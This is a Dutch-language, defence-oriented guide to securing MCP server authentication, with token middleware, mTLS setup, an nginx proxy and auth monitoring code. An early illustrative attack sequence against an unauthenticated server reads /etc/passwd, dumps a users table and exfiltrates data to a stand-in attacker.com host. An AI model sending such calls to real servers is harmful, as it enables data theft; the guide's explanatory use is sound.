Hiaten in MCP-authenticatie: MCP-serverauthenticatie beveiligen
Een verdediging-gerichte handleiding om authenticatiezwakheden in MCP-serverdeployments te begrijpen -- 38% van de gescande servers heeft helemaal geen authenticatie -- en om robuuste token-gebaseerde auth, mTLS en middleware-gebaseerde toegangscontrole te implementeren.
De MCP-specificatie laat authenticatie bewust over aan de implementatie in plaats van het tot protocolvereiste te maken. Deze ontwerpkeuze -- bedoeld om de drempel voor adoptie te verlagen -- heeft geleid tot een beveiligingslandschap waarin 38% van de 500+ publiek toegankelijke MCP-servers die door het VulnerableMCP-project zijn gescand, helemaal geen authenticatie implementeert.
Voor MCP-servers die toegankelijk zijn via HTTP+SSE betekent het ontbreken van authenticatie dat iedereen die het serverendpoint kan bereiken de tools kan opvragen, ze kan aanroepen en de resultaten kan ontvangen. Bij stdio-gebaseerde servers die lokaal draaien, betekent het ontbreken van authenticatie dat elk proces op de host verbinding kan maken met de stdin/stdout van de server.
Het authenticatiehiaat begrijpen
Waarom MCP geen ingebouwde authenticatie heeft
De MCP-protocolspecificatie (versie 2024-11-05) definieert het berichtformaat, de capability-onderhandeling en de semantiek van tool-aanroepen, maar definieert expliciet niet:
- Hoe clients hun identiteit bewijzen aan servers
- Hoe servers valideren of een client geautoriseerd is om specifieke tools aan te roepen
- Hoe transportkanalen worden beveiligd tegen afluisteren of manipulatie
- Hoe sessies worden beheerd of ingetrokken
MCP-protocollaag (JSON-RPC 2.0):
┌────────────────────────────────────────┐
│ initialize / tools/list / tools/call │ ← Geen auth-velden in protocol
└──────────────┬─────────────────────────┘
│
Transportlaag: │ ← Auth moet hier worden geïmplementeerd
┌──────────────┴─────────────────────────┐
│ stdio (lokaal)│ HTTP+SSE (netwerk) │
│ Geen auth │ Auth is "optioneel" │
│ Alleen │ TLS aanbevolen │
│ procesisolatie│ maar niet vereist │
└────────────────────────────────────────┘
Deze gelaagdheid betekent dat de beveiliging volledig afhangt van wat de serverimplementator in de transportlaag inbouwt -- en de meeste MCP-servertemplates en tutorials worden geleverd zonder enige authenticatiecode.
Transporttypes en hun beveiligingseigenschappen
stdio-transport:
┌──────────┐ stdin/stdout ┌──────────┐
│ MCP Host │ ◄──────────────► │ MCP │
│ (Client) │ (pipes) │ Server │
└──────────┘ └──────────┘
Beveiliging: Alleen procesisolatie
Auth: Geen (wie het proces start, beheert het)
Dreigingen: Lokale privilege-escalatie, supply chain
(kwaadaardig pakket vervangt server-binary)
HTTP+SSE-transport:
┌──────────┐ HTTP POST/SSE ┌──────────┐
│ MCP │ ◄────────────────► │ MCP │
│ Client │ (netwerk) │ Server │
└──────────┘ └──────────┘
Beveiliging: Hangt volledig af van de implementatie
Auth: Niet vereist door de spec -- moet worden toegevoegd
Dreigingen: Ongeautoriseerde toegang, MITM, session hijacking,
diefstal van credentials, denial of service
Streamable HTTP-transport (2025+):
┌──────────┐ HTTP streams ┌──────────┐
│ MCP │ ◄────────────────► │ MCP │
│ Client │ (bidirectioneel)│ Server │
└──────────┘ └──────────┘
Beveiliging: Hetzelfde als HTTP+SSE maar met sessiebeheer
Auth: OAuth2 aanbevolen maar niet afgedwongen
Dreigingen: Hetzelfde als HTTP+SSE plus session fixation
Wat ongeauthenticeerde toegang mogelijk maakt
Een aanvaller die een ongeauthenticeerde MCP-server bereikt, kan:
- Capabilities ontdekken:
tools/listaanroepen om alle beschikbare tools, hun parameters en beschrijvingen op te sommen - Tools uitvoeren:
tools/callaanroepen met willekeurige parameters om elke geregistreerde tool te activeren - Data exfiltreren: Bestandslees-, database- of API-tools gebruiken om gevoelige informatie te onttrekken
- State wijzigen: Schrijftools gebruiken om bestanden, databaserecords of externe systemen te veranderen
- Verder pivoten: De toegang van de server tot interne diensten gebruiken als pad voor laterale beweging
// Een aanvaller kan simpelweg JSON-RPC-requests sturen naar een ongeauthenticeerde MCP-server
// Stap 1: Tools ontdekken
{"jsonrpc": "2.0", "method": "tools/list", "id": 1}
// Stap 2: Gevoelige bestanden lezen
{"jsonrpc": "2.0", "method": "tools/call", "id": 2,
"params": {"name": "read_file", "arguments": {"path": "/etc/passwd"}}}
// Stap 3: Interne databases benaderen
{"jsonrpc": "2.0", "method": "tools/call", "id": 3,
"params": {"name": "query_db", "arguments": {"query": "SELECT * FROM users"}}}
// Stap 4: Exfiltreren via beschikbare tools
{"jsonrpc": "2.0", "method": "tools/call", "id": 4,
"params": {"name": "http_request", "arguments": {
"url": "https://attacker.com/collect",
"method": "POST",
"body": "stolen_data_here"
}}}Token-gebaseerde authenticatie voor MCP-servers implementeren
De eenvoudigste verdediging is het toevoegen van token-gebaseerde authenticatie aan HTTP+SSE-MCP-servers. Hieronder staat een volledige implementatie.
Authenticatie-middleware
"""
MCP-authenticatie-middleware
Implementeert Bearer token- en API-sleutel-authenticatie voor MCP HTTP+SSE-servers.
"""
import os
import hmac
import hashlib
import time
import json
import secrets
import logging
from functools import wraps
from dataclasses import dataclass, field
from typing import Optional, Callable
from datetime import datetime, timedelta
logger = logging.getLogger("mcp.auth")
@dataclass
class AuthToken:
"""Representeert een geauthenticeerd API-token."""
token_id: str
client_name: str
scopes: set[str] # Toegestane toolnamen of "*" voor alles
created_at: datetime
expires_at: Optional[datetime]
rate_limit: int = 100 # Aanroepen per minuut
is_active: bool = True
@dataclass
class AuthResult:
"""Resultaat van een authenticatiepoging."""
authenticated: bool
token: Optional[AuthToken] = None
error: Optional[str] = None
client_ip: Optional[str] = None
class MCPAuthProvider:
"""
Authenticatieprovider voor MCP-servers.
Ondersteunt Bearer tokens en HMAC-ondertekende API-sleutels.
"""
def __init__(self, token_store_path: str = "/var/mcp/auth/tokens.json"):
self.token_store_path = token_store_path
self.tokens: dict[str, AuthToken] = {}
self._rate_tracker: dict[str, list[float]] = {}
self._load_tokens()
def _load_tokens(self):
"""Laad tokendefinities uit de versleutelde store."""
if not os.path.exists(self.token_store_path):
logger.warning("Token store not found at %s", self.token_store_path)
return
with open(self.token_store_path, 'r') as f:
data = json.load(f)
for entry in data.get("tokens", []):
# Sla alleen de hash van elk token op ter vergelijking
token = AuthToken(
token_id=entry["id"],
client_name=entry["client_name"],
scopes=set(entry.get("scopes", ["*"])),
created_at=datetime.fromisoformat(entry["created_at"]),
expires_at=(
datetime.fromisoformat(entry["expires_at"])
if entry.get("expires_at") else None
),
rate_limit=entry.get("rate_limit", 100),
is_active=entry.get("is_active", True),
)
# De sleutel is de SHA-256-hash van de daadwerkelijke tokenwaarde
self.tokens[entry["token_hash"]] = token
def authenticate(self, request_headers: dict,
client_ip: str = "unknown") -> AuthResult:
"""
Authenticeer een binnenkomende MCP-request.
Controleert op een Bearer token in de Authorization-header of
de X-API-Key-header.
"""
# Haal het token uit de headers
auth_header = request_headers.get("Authorization", "")
api_key = request_headers.get("X-API-Key", "")
raw_token = None
if auth_header.startswith("Bearer "):
raw_token = auth_header[7:]
elif api_key:
raw_token = api_key
if not raw_token:
logger.warning(
"Authentication failed: no token provided from %s", client_ip
)
return AuthResult(
authenticated=False,
error="No authentication token provided",
client_ip=client_ip,
)
# Hash het meegegeven token en zoek het op
token_hash = hashlib.sha256(raw_token.encode()).hexdigest()
token_record = self.tokens.get(token_hash)
if token_record is None:
logger.warning(
"Authentication failed: invalid token from %s", client_ip
)
return AuthResult(
authenticated=False,
error="Invalid authentication token",
client_ip=client_ip,
)
# Controleer de tokenstatus
if not token_record.is_active:
return AuthResult(
authenticated=False,
error="Token has been revoked",
client_ip=client_ip,
)
if (token_record.expires_at and
datetime.utcnow() > token_record.expires_at):
return AuthResult(
authenticated=False,
error="Token has expired",
client_ip=client_ip,
)
# Controleer de rate limit
if not self._check_rate_limit(token_record.token_id,
token_record.rate_limit):
return AuthResult(
authenticated=False,
token=token_record,
error="Rate limit exceeded",
client_ip=client_ip,
)
logger.info(
"Authenticated client '%s' (token: %s) from %s",
token_record.client_name, token_record.token_id, client_ip,
)
return AuthResult(
authenticated=True,
token=token_record,
client_ip=client_ip,
)
def authorize_tool_call(self, auth_result: AuthResult,
tool_name: str) -> bool:
"""Controleer of de geauthenticeerde client een specifieke tool mag aanroepen."""
if not auth_result.authenticated or auth_result.token is None:
return False
scopes = auth_result.token.scopes
if "*" in scopes:
return True
return tool_name in scopes
def _check_rate_limit(self, token_id: str, limit: int) -> bool:
"""Eenvoudige rate limiter met schuivend venster."""
now = time.time()
window = self._rate_tracker.setdefault(token_id, [])
# Verwijder entries ouder dan 60 seconden
self._rate_tracker[token_id] = [
t for t in window if now - t < 60
]
if len(self._rate_tracker[token_id]) >= limit:
return False
self._rate_tracker[token_id].append(now)
return True
@staticmethod
def generate_token() -> tuple[str, str]:
"""
Genereer een nieuw API-token.
Geeft (raw_token, token_hash) terug -- bewaar alleen de hash.
"""
raw_token = f"mcp_{secrets.token_urlsafe(32)}"
token_hash = hashlib.sha256(raw_token.encode()).hexdigest()
return raw_token, token_hashScript voor tokenbeheer
#!/bin/bash
# mcp-token-manager.sh -- Genereer en beheer authenticatietokens voor MCP-servers
# Gebruik: ./mcp-token-manager.sh generate|revoke|list [opties]
set -euo pipefail
TOKEN_STORE="/var/mcp/auth/tokens.json"
BACKUP_DIR="/var/mcp/auth/backups"
ensure_store_exists() {
mkdir -p "$(dirname "$TOKEN_STORE")"
mkdir -p "$BACKUP_DIR"
chmod 700 "$(dirname "$TOKEN_STORE")"
if [ ! -f "$TOKEN_STORE" ]; then
echo '{"tokens": []}' > "$TOKEN_STORE"
chmod 600 "$TOKEN_STORE"
fi
}
generate_token() {
local client_name="${1:?Gebruik: generate <client_name> [scopes] [expiry_days]}"
local scopes="${2:-*}"
local expiry_days="${3:-90}"
ensure_store_exists
# Genereer een veilig willekeurig token
local raw_token="mcp_$(openssl rand -base64 32 | tr -d '/+=' | head -c 43)"
local token_hash
token_hash=$(echo -n "$raw_token" | sha256sum | awk '{print $1}')
local token_id
token_id=$(openssl rand -hex 8)
local created_at
created_at=$(date -u +"%Y-%m-%dT%H:%M:%SZ")
local expires_at
expires_at=$(date -u -d "+${expiry_days} days" +"%Y-%m-%dT%H:%M:%SZ")
# Maak een back-up van de huidige store
cp "$TOKEN_STORE" "${BACKUP_DIR}/tokens_$(date +%s).json"
# Voeg het token toe aan de store (bewaar alleen de hash)
local tmp
tmp=$(mktemp)
jq --arg id "$token_id" \
--arg name "$client_name" \
--arg hash "$token_hash" \
--arg scopes "$scopes" \
--arg created "$created_at" \
--arg expires "$expires_at" \
'.tokens += [{
"id": $id,
"client_name": $name,
"token_hash": $hash,
"scopes": ($scopes | split(",")),
"created_at": $created,
"expires_at": $expires,
"rate_limit": 100,
"is_active": true
}]' "$TOKEN_STORE" > "$tmp"
mv "$tmp" "$TOKEN_STORE"
chmod 600 "$TOKEN_STORE"
echo "============================================"
echo " MCP-token succesvol gegenereerd"
echo "============================================"
echo " Token-ID: $token_id"
echo " Client: $client_name"
echo " Scopes: $scopes"
echo " Verloopt: $expires_at"
echo ""
echo " RAW TOKEN (bewaar dit -- het kan niet worden hersteld):"
echo " $raw_token"
echo "============================================"
}
revoke_token() {
local token_id="${1:?Gebruik: revoke <token_id>}"
ensure_store_exists
cp "$TOKEN_STORE" "${BACKUP_DIR}/tokens_$(date +%s).json"
local tmp
tmp=$(mktemp)
jq --arg id "$token_id" \
'(.tokens[] | select(.id == $id)).is_active = false' \
"$TOKEN_STORE" > "$tmp"
mv "$tmp" "$TOKEN_STORE"
chmod 600 "$TOKEN_STORE"
echo "Token $token_id is ingetrokken."
}
list_tokens() {
ensure_store_exists
echo "Actieve MCP-tokens:"
echo "-------------------"
jq -r '.tokens[] | select(.is_active == true) |
"ID: \(.id) Client: \(.client_name) Scopes: \(.scopes | join(",")) Expires: \(.expires_at)"' \
"$TOKEN_STORE"
}
case "${1:-help}" in
generate) generate_token "${@:2}" ;;
revoke) revoke_token "${@:2}" ;;
list) list_tokens ;;
*) echo "Gebruik: $0 generate|revoke|list [opties]" ;;
esacAuth-middleware integreren met een MCP-server
"""
Voorbeeld: MCP-server met authenticatie-middleware via de Python-SDK.
"""
from mcp.server import Server
from mcp.server.sse import SseServerTransport
from starlette.applications import Starlette
from starlette.routing import Route, Mount
from starlette.requests import Request
from starlette.responses import JSONResponse
from starlette.middleware import Middleware
from starlette.middleware.base import BaseHTTPMiddleware
import uvicorn
from mcp_auth import MCPAuthProvider
class MCPAuthMiddleware(BaseHTTPMiddleware):
"""Starlette-middleware die MCP-authenticatie afdwingt."""
# Paden die geen authenticatie vereisen
PUBLIC_PATHS = {"/health", "/ready"}
def __init__(self, app, auth_provider: MCPAuthProvider):
super().__init__(app)
self.auth = auth_provider
async def dispatch(self, request: Request, call_next):
# Sla auth over voor health checks
if request.url.path in self.PUBLIC_PATHS:
return await call_next(request)
# Authenticeer de request
client_ip = request.client.host if request.client else "unknown"
auth_result = self.auth.authenticate(
dict(request.headers), client_ip
)
if not auth_result.authenticated:
return JSONResponse(
{"jsonrpc": "2.0", "error": {
"code": -32001,
"message": auth_result.error
}},
status_code=401,
headers={"WWW-Authenticate": "Bearer"},
)
# Koppel de auth-context aan de request-state voor autorisatie op toolniveau
request.state.auth = auth_result
return await call_next(request)
# Maak de MCP-server aan
server = Server("secure-mcp-server")
auth_provider = MCPAuthProvider("/var/mcp/auth/tokens.json")
# Definieer tools met autorisatiecontroles
@server.list_tools()
async def list_tools():
return [
{
"name": "read_file",
"description": "Read a file from the workspace",
"inputSchema": {
"type": "object",
"properties": {"path": {"type": "string"}},
"required": ["path"],
},
},
{
"name": "query_database",
"description": "Run a read-only database query",
"inputSchema": {
"type": "object",
"properties": {"query": {"type": "string"}},
"required": ["query"],
},
},
]
@server.call_tool()
async def call_tool(name: str, arguments: dict):
# Autorisatie op toolniveau zou hier worden gecontroleerd via request.state.auth
# Dit is een vereenvoudigd voorbeeld
if name == "read_file":
path = arguments["path"]
# ... gevalideerde logica voor het lezen van bestanden ...
return [{"type": "text", "text": f"Contents of {path}"}]
elif name == "query_database":
query = arguments["query"]
# ... gevalideerde querylogica ...
return [{"type": "text", "text": f"Query results for: {query}"}]
# Koppel de Starlette-app met de auth-middleware
sse = SseServerTransport("/messages/")
async def handle_sse(request: Request):
async with sse.connect_sse(
request.scope, request.receive, request._send
) as streams:
await server.run(
streams[0], streams[1], server.create_initialization_options()
)
app = Starlette(
routes=[
Route("/sse", endpoint=handle_sse),
Mount("/messages/", app=sse.handle_post_message),
],
middleware=[
Middleware(MCPAuthMiddleware, auth_provider=auth_provider),
],
)
if __name__ == "__main__":
uvicorn.run(app, host="127.0.0.1", port=8443, ssl_certfile="/var/mcp/certs/server.crt",
ssl_keyfile="/var/mcp/certs/server.key")mTLS configureren voor deployments met hoge beveiligingseisen
Voor omgevingen die gevoelige data verwerken of in gereguleerde sectoren opereren, biedt mutual TLS sterke cryptografische authenticatie waarbij zowel de client als de server een certificaat presenteert.
Opzet van de Certificate Authority
#!/bin/bash
# setup-mcp-ca.sh -- Maak een private CA aan voor MCP mTLS-authenticatie
set -euo pipefail
CA_DIR="/var/mcp/ca"
CERT_DAYS=365
CA_DAYS=3650
mkdir -p "${CA_DIR}"/{certs,private,crl,newcerts}
chmod 700 "${CA_DIR}/private"
touch "${CA_DIR}/index.txt"
echo 1000 > "${CA_DIR}/serial"
echo "[*] CA private key genereren..."
openssl genrsa -aes256 -out "${CA_DIR}/private/ca.key" 4096
chmod 400 "${CA_DIR}/private/ca.key"
echo "[*] CA-certificaat aanmaken..."
openssl req -new -x509 -days ${CA_DAYS} \
-key "${CA_DIR}/private/ca.key" \
-out "${CA_DIR}/certs/ca.crt" \
-subj "/C=US/ST=Security/O=MCP Security/CN=MCP Internal CA" \
-addext "basicConstraints=critical,CA:TRUE,pathlen:0" \
-addext "keyUsage=critical,keyCertSign,cRLSign"
echo "[*] MCP-servercertificaat genereren..."
openssl genrsa -out "${CA_DIR}/private/mcp-server.key" 2048
chmod 400 "${CA_DIR}/private/mcp-server.key"
openssl req -new \
-key "${CA_DIR}/private/mcp-server.key" \
-out "${CA_DIR}/certs/mcp-server.csr" \
-subj "/C=US/ST=Security/O=MCP Security/CN=mcp-server"
openssl x509 -req -days ${CERT_DAYS} \
-in "${CA_DIR}/certs/mcp-server.csr" \
-CA "${CA_DIR}/certs/ca.crt" \
-CAkey "${CA_DIR}/private/ca.key" \
-CAcreateserial \
-out "${CA_DIR}/certs/mcp-server.crt" \
-extfile <(cat <<-EXTEOF
basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment
extendedKeyUsage = serverAuth
subjectAltName = DNS:mcp-server,DNS:mcp-server.internal,IP:127.0.0.1
EXTEOF
)
echo "[+] CA- en servercertificaten aangemaakt."
echo " CA-cert: ${CA_DIR}/certs/ca.crt"
echo " Servercert: ${CA_DIR}/certs/mcp-server.crt"
echo " Serverkey: ${CA_DIR}/private/mcp-server.key"#!/bin/bash
# generate-mcp-client-cert.sh -- Genereer een clientcertificaat voor MCP mTLS
# Gebruik: ./generate-mcp-client-cert.sh <client_name>
set -euo pipefail
CA_DIR="/var/mcp/ca"
CLIENT_NAME="${1:?Gebruik: generate-mcp-client-cert.sh <client_name>}"
CERT_DAYS=90
echo "[*] Clientkey genereren voor '${CLIENT_NAME}'..."
openssl genrsa -out "${CA_DIR}/private/${CLIENT_NAME}.key" 2048
chmod 400 "${CA_DIR}/private/${CLIENT_NAME}.key"
echo "[*] CSR aanmaken..."
openssl req -new \
-key "${CA_DIR}/private/${CLIENT_NAME}.key" \
-out "${CA_DIR}/certs/${CLIENT_NAME}.csr" \
-subj "/C=US/ST=Security/O=MCP Security/CN=${CLIENT_NAME}"
echo "[*] Ondertekenen met de CA..."
openssl x509 -req -days ${CERT_DAYS} \
-in "${CA_DIR}/certs/${CLIENT_NAME}.csr" \
-CA "${CA_DIR}/certs/ca.crt" \
-CAkey "${CA_DIR}/private/ca.key" \
-CAcreateserial \
-out "${CA_DIR}/certs/${CLIENT_NAME}.crt" \
-extfile <(cat <<-EXTEOF
basicConstraints = CA:FALSE
keyUsage = digitalSignature
extendedKeyUsage = clientAuth
EXTEOF
)
echo "[+] Clientcertificaat aangemaakt voor '${CLIENT_NAME}'."
echo " Cert: ${CA_DIR}/certs/${CLIENT_NAME}.crt"
echo " Key: ${CA_DIR}/private/${CLIENT_NAME}.key"
echo " Verloopt over ${CERT_DAYS} dagen"
echo ""
echo " Gebruik met curl:"
echo " curl --cert ${CA_DIR}/certs/${CLIENT_NAME}.crt \\"
echo " --key ${CA_DIR}/private/${CLIENT_NAME}.key \\"
echo " --cacert ${CA_DIR}/certs/ca.crt \\"
echo " https://mcp-server:8443/sse"Configuratie van een MCP-server met mTLS
"""
MCP-server met mTLS-authenticatie.
Haalt de clientidentiteit uit het TLS-certificaat.
"""
import ssl
import logging
from starlette.applications import Starlette
from starlette.requests import Request
from starlette.responses import JSONResponse
from starlette.routing import Route
import uvicorn
logger = logging.getLogger("mcp.mtls")
# Client-certificaat-CN -> toegestane tool-scopes
CLIENT_PERMISSIONS = {
"agent-production": {"*"}, # Volledige toegang
"agent-staging": {"read_file", "list_files"}, # Alleen-lezen
"monitoring": {"health_check", "get_metrics"}, # Alleen monitoring
}
def create_ssl_context() -> ssl.SSLContext:
"""Maak een SSL-context met mTLS-configuratie."""
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Servercertificaat en -sleutel
ctx.load_cert_chain(
certfile="/var/mcp/ca/certs/mcp-server.crt",
keyfile="/var/mcp/ca/private/mcp-server.key",
)
# Vereis clientcertificaten ondertekend door onze CA
ctx.load_verify_locations(cafile="/var/mcp/ca/certs/ca.crt")
ctx.verify_mode = ssl.CERT_REQUIRED
# Sterke TLS-configuratie
ctx.minimum_version = ssl.TLSVersion.TLSv1_3
ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM")
# Laad de CRL voor ingetrokken certificaten
ctx.load_verify_locations(cafile="/var/mcp/ca/crl/revoked.pem")
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
return ctx
async def extract_client_identity(request: Request) -> dict:
"""Haal de clientidentiteit uit het mTLS-certificaat."""
# Haal het peer-certificaat op uit het transport
transport = request.scope.get("transport")
if not transport:
return {"authenticated": False, "error": "No transport"}
peercert = transport.get_extra_info("peercert")
if not peercert:
return {"authenticated": False, "error": "No client certificate"}
# Haal de Common Name eruit
subject = dict(x[0] for x in peercert.get("subject", ()))
client_cn = subject.get("commonName", "unknown")
# Zoek de permissies op
scopes = CLIENT_PERMISSIONS.get(client_cn)
if scopes is None:
logger.warning("Unknown client CN: %s", client_cn)
return {
"authenticated": True,
"authorized": False,
"client_cn": client_cn,
"error": "Client not in permissions table",
}
return {
"authenticated": True,
"authorized": True,
"client_cn": client_cn,
"scopes": scopes,
}
async def handle_tool_call(request: Request):
"""Verwerk MCP-tool-aanroepen met mTLS-gebaseerde autorisatie."""
identity = await extract_client_identity(request)
if not identity.get("authenticated"):
return JSONResponse({"error": "mTLS authentication failed"}, status_code=401)
if not identity.get("authorized"):
return JSONResponse({"error": "Client not authorized"}, status_code=403)
# Parse de JSON-RPC-request
body = await request.json()
tool_name = body.get("params", {}).get("name", "")
# Controleer de autorisatie op toolniveau
if "*" not in identity["scopes"] and tool_name not in identity["scopes"]:
logger.warning(
"Client %s attempted unauthorized tool call: %s",
identity["client_cn"], tool_name,
)
return JSONResponse({
"jsonrpc": "2.0",
"error": {"code": -32003, "message": f"Not authorized for tool: {tool_name}"},
"id": body.get("id"),
}, status_code=403)
# Verwerk de geautoriseerde tool-aanroep
logger.info("Authorized %s -> %s", identity["client_cn"], tool_name)
# ... logica voor tool-uitvoering ...
return JSONResponse({"jsonrpc": "2.0", "result": {"status": "ok"}, "id": body.get("id")})
app = Starlette(routes=[Route("/mcp", handle_tool_call, methods=["POST"])])
if __name__ == "__main__":
uvicorn.run(
app,
host="0.0.0.0",
port=8443,
ssl=create_ssl_context(),
)Nginx-reverseproxy met authenticatie
Plaats voor productie-deployments een Nginx-reverseproxy vóór de MCP-servers:
# /etc/nginx/conf.d/mcp-server.conf
# Nginx-reverseproxy voor een MCP-server met authenticatie
upstream mcp_backend {
server 127.0.0.1:8080;
keepalive 32;
}
# Zones voor rate limiting
limit_req_zone $binary_remote_addr zone=mcp_init:10m rate=5r/m;
limit_req_zone $binary_remote_addr zone=mcp_tools:10m rate=30r/m;
limit_conn_zone $binary_remote_addr zone=mcp_conn:10m;
server {
listen 443 ssl http2;
server_name mcp.internal.example.com;
# TLS-configuratie
ssl_certificate /var/mcp/ca/certs/mcp-server.crt;
ssl_certificate_key /var/mcp/ca/private/mcp-server.key;
ssl_protocols TLSv1.3;
ssl_ciphers ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384;
ssl_prefer_server_ciphers on;
# mTLS -- vereis clientcertificaten
ssl_client_certificate /var/mcp/ca/certs/ca.crt;
ssl_verify_client on;
ssl_verify_depth 2;
ssl_crl /var/mcp/ca/crl/revoked.pem;
# Verbindingslimieten
limit_conn mcp_conn 10;
# Security headers
add_header X-Content-Type-Options nosniff always;
add_header X-Frame-Options DENY always;
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
# Health check (geen auth vereist)
location /health {
proxy_pass http://mcp_backend/health;
access_log off;
}
# SSE-endpoint (initialisatie)
location /sse {
limit_req zone=mcp_init burst=3 nodelay;
# Geef de clientcertificaatinfo door aan de backend
proxy_set_header X-Client-CN $ssl_client_s_dn_cn;
proxy_set_header X-Client-Verified $ssl_client_verify;
proxy_set_header X-Client-Fingerprint $ssl_client_fingerprint;
# SSE-specifieke proxy-instellingen
proxy_pass http://mcp_backend/sse;
proxy_http_version 1.1;
proxy_set_header Connection "";
proxy_buffering off;
proxy_cache off;
proxy_read_timeout 3600s;
proxy_send_timeout 3600s;
}
# Endpoint voor tool-aanroepen
location /messages/ {
limit_req zone=mcp_tools burst=10 nodelay;
proxy_set_header X-Client-CN $ssl_client_s_dn_cn;
proxy_set_header X-Client-Verified $ssl_client_verify;
proxy_pass http://mcp_backend/messages/;
proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
# Limiet voor de grootte van de request-body
client_max_body_size 1m;
}
# Blokkeer al het overige
location / {
return 404;
}
# Access logging met clientidentiteit
access_log /var/log/nginx/mcp-access.log combined;
error_log /var/log/nginx/mcp-error.log warn;
}
# Stuur HTTP door naar HTTPS
server {
listen 80;
server_name mcp.internal.example.com;
return 301 https://$server_name$request_uri;
}Authenticatiemonitoring en waarschuwingen
"""
MCP-authenticatiemonitoring -- detecteert anomalieën in authenticatie.
"""
import json
import logging
from datetime import datetime, timedelta
from collections import defaultdict
from dataclasses import dataclass, field
logger = logging.getLogger("mcp.auth.monitor")
@dataclass
class AuthEvent:
timestamp: datetime
client_ip: str
client_cn: str
event_type: str # success, failure, revoked, expired, rate_limited
tool_name: str = ""
details: str = ""
class AuthMonitor:
"""Monitort authenticatie-events op anomalieën."""
def __init__(self, alert_callback=None):
self.events: list[AuthEvent] = []
self.failure_counts: dict[str, int] = defaultdict(int)
self.alert_callback = alert_callback or self._default_alert
self._alert_thresholds = {
"brute_force": 10, # mislukkingen per IP per uur
"credential_stuffing": 5, # unieke ongeldige tokens per IP per uur
"unusual_scope": 3, # ongeautoriseerde tool-toegangspogingen
}
def record_event(self, event: AuthEvent):
"""Registreer en analyseer een authenticatie-event."""
self.events.append(event)
if event.event_type == "failure":
self.failure_counts[event.client_ip] += 1
self._check_brute_force(event)
if event.event_type == "unauthorized_tool":
self._check_scope_abuse(event)
# Verwijder oude events (bewaar 24 uur)
cutoff = datetime.utcnow() - timedelta(hours=24)
self.events = [e for e in self.events if e.timestamp > cutoff]
def _check_brute_force(self, event: AuthEvent):
"""Detecteer brute force-authenticatiepogingen."""
cutoff = datetime.utcnow() - timedelta(hours=1)
recent_failures = sum(
1 for e in self.events
if e.client_ip == event.client_ip
and e.event_type == "failure"
and e.timestamp > cutoff
)
if recent_failures >= self._alert_thresholds["brute_force"]:
self.alert_callback({
"alert_type": "brute_force_detected",
"severity": "high",
"client_ip": event.client_ip,
"failure_count": recent_failures,
"window": "1 hour",
"recommendation": f"Block IP {event.client_ip} and investigate",
})
def _check_scope_abuse(self, event: AuthEvent):
"""Detecteer clients die ongeautoriseerde tools proberen te benaderen."""
cutoff = datetime.utcnow() - timedelta(hours=1)
scope_violations = sum(
1 for e in self.events
if e.client_cn == event.client_cn
and e.event_type == "unauthorized_tool"
and e.timestamp > cutoff
)
if scope_violations >= self._alert_thresholds["unusual_scope"]:
self.alert_callback({
"alert_type": "scope_abuse_detected",
"severity": "high",
"client_cn": event.client_cn,
"violation_count": scope_violations,
"last_tool": event.tool_name,
"recommendation": (
f"Review permissions for {event.client_cn} "
f"and check for compromised credentials"
),
})
def _default_alert(self, alert: dict):
logger.critical(json.dumps({
"event": "mcp_auth_alert",
**alert,
"timestamp": datetime.utcnow().isoformat(),
}))
def get_dashboard_stats(self) -> dict:
"""Geef statistieken terug voor het security-dashboard."""
cutoff_1h = datetime.utcnow() - timedelta(hours=1)
cutoff_24h = datetime.utcnow() - timedelta(hours=24)
events_1h = [e for e in self.events if e.timestamp > cutoff_1h]
events_24h = [e for e in self.events if e.timestamp > cutoff_24h]
return {
"last_hour": {
"total": len(events_1h),
"successes": sum(1 for e in events_1h if e.event_type == "success"),
"failures": sum(1 for e in events_1h if e.event_type == "failure"),
"unique_ips": len(set(e.client_ip for e in events_1h)),
},
"last_24h": {
"total": len(events_24h),
"successes": sum(1 for e in events_24h if e.event_type == "success"),
"failures": sum(1 for e in events_24h if e.event_type == "failure"),
"unique_ips": len(set(e.client_ip for e in events_24h)),
"unique_clients": len(set(
e.client_cn for e in events_24h if e.event_type == "success"
)),
},
}stdio-gebaseerde MCP-servers beveiligen
stdio-servers gebruiken geen netwerkauthenticatie, maar ze hebben nog steeds toegangscontrole nodig:
"""
Beveiligingscontroles voor stdio-gebaseerde MCP-servers.
Omdat stdio toegang op procesniveau gebruikt, richten de controles zich op:
- Het verifiëren van de identiteit van het bovenliggende proces
- Het beperken van welke tools het startende proces mag benaderen
- Het loggen van alle bewerkingen voor audit
"""
import os
import json
import logging
from pathlib import Path
logger = logging.getLogger("mcp.stdio.security")
def verify_parent_process() -> dict:
"""
Verifieer de identiteit van het proces dat deze MCP-server heeft gestart.
Geeft informatie over het bovenliggende proces terug voor autorisatiebeslissingen.
"""
ppid = os.getppid()
parent_info = {}
try:
# Lees de command line van het bovenliggende proces
cmdline_path = f"/proc/{ppid}/cmdline"
with open(cmdline_path, 'rb') as f:
cmdline = f.read().decode('utf-8', errors='replace').split('\x00')
parent_info["cmdline"] = cmdline
# Lees het uitvoerbare bestand van het bovenliggende proces
exe_path = os.readlink(f"/proc/{ppid}/exe")
parent_info["executable"] = exe_path
# Lees de gebruiker van het bovenliggende proces
stat_path = f"/proc/{ppid}/status"
with open(stat_path, 'r') as f:
for line in f:
if line.startswith("Uid:"):
uids = line.split()[1:]
parent_info["uid"] = int(uids[0])
elif line.startswith("Gid:"):
gids = line.split()[1:]
parent_info["gid"] = int(gids[0])
except (FileNotFoundError, PermissionError) as e:
logger.error("Cannot verify parent process %d: %s", ppid, e)
parent_info["error"] = str(e)
return parent_info
# Allowlist van uitvoerbare bestanden die deze MCP-server mogen starten
ALLOWED_PARENTS = {
"/usr/bin/claude",
"/usr/local/bin/cursor",
"/usr/bin/code",
"/opt/mcp-host/bin/mcp-host",
}
def enforce_parent_allowlist():
"""Weiger te starten als het bovenliggende proces niet in de allowlist staat."""
parent = verify_parent_process()
exe = parent.get("executable", "unknown")
if exe not in ALLOWED_PARENTS:
logger.critical(
"MCP server started by unauthorized parent: %s (PID %d)",
exe, os.getppid()
)
